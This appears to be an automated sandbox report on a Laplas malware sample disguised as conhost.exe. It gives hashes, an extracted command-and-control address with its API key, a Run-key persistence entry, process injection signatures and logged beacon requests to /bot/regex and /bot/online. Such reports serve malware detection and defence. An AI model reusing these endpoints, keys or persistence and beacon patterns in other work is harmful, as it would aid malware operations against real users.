Analysis
-
max time kernel
135s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
17-05-2023 15:29
Static task
static1
Behavioral task
behavioral1
Sample
conhost.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
conhost.exe
Resource
win10v2004-20230220-en
General
-
Target
conhost.exe
-
Size
4.0MB
-
MD5
feccda803ece2e7a3b7e9798714ad47e
-
SHA1
e97182adccf8a7692e6ad2614b0fb7fd3898a1a2
-
SHA256
14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320
-
SHA512
dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287
-
SSDEEP
49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe
Malware Config
Extracted
laplas
http://185.223.93.251
-
api_key
f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 536 ntlhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" conhost.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 21 Go-http-client/1.1 -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2172 wrote to memory of 536 2172 conhost.exe 84 PID 2172 wrote to memory of 536 2172 conhost.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe2⤵
- Executes dropped EXE
PID:536
-
Network
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:185.223.93.251:80RequestGET /bot/regex HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:29:52 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Adminntlhost.exeRemote address:185.223.93.251:80RequestGET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:29:52 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:185.223.93.251:80RequestGET /bot/regex HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:30:52 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Adminntlhost.exeRemote address:185.223.93.251:80RequestGET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:30:52 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:185.223.93.251:80RequestGET /bot/regex HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:31:53 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Adminntlhost.exeRemote address:185.223.93.251:80RequestGET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
Host: 185.223.93.251
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:31:53 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request251.93.223.185.in-addr.arpaIN PTRResponse251.93.223.185.in-addr.arpaIN PTRcustomerclientshostnamecom
-
Remote address:8.8.8.8:53Request86.8.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
260 B 5
-
322 B 7
-
185.223.93.251:80http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Adminhttpntlhost.exe1.6kB 3.7kB 15 17
HTTP Request
GET http://185.223.93.251/bot/regexHTTP Response
200HTTP Request
GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\AdminHTTP Response
200HTTP Request
GET http://185.223.93.251/bot/regexHTTP Response
200HTTP Request
GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\AdminHTTP Response
200HTTP Request
GET http://185.223.93.251/bot/regexHTTP Response
200HTTP Request
GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\AdminHTTP Response
200 -
260 B 5
-
322 B 7
-
322 B 7
-
322 B 7
-
260 B 5
-
260 B 5
-
322 B 7
-
260 B 5
-
260 B 5
-
260 B 5
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
76.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
73 B 115 B 1 1
DNS Request
251.93.223.185.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.8.109.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
384.8MB
MD559e30a386a548161ffb85ce155376f69
SHA1953b85e50bfde88e1c3309a0cb49e86e1a78b13a
SHA2562c4651ef6233e71269286dad60dd3fdae2d48d18080f8d65227c438a7f5d381f
SHA5127278dd127883e1b7fa167a92b50becd4ab29e5098b03ea95740710302457a61c05ebf7347610ef12cca79fd3723602f7977aa8919de25f33f06212e6b4fce2fd
-
Filesize
381.7MB
MD5a43f106734e07aaf60929de2f6a7a308
SHA1f7ece4e6e6cd7fc1f4a6432493789bbb5a6abb1e
SHA256aa9c6c193aa0c6fd91492db278475f1400f876ccc8cbcefc18e0b3a522faeffd
SHA5121109434606fda21698a28bd793a18bd2f4b8b42aa44f7ad54234b9043e4b8272584bb3cd53ef97a9a9f8d9159d797a4fae6babfb1bb1b6560210e57f95e1313f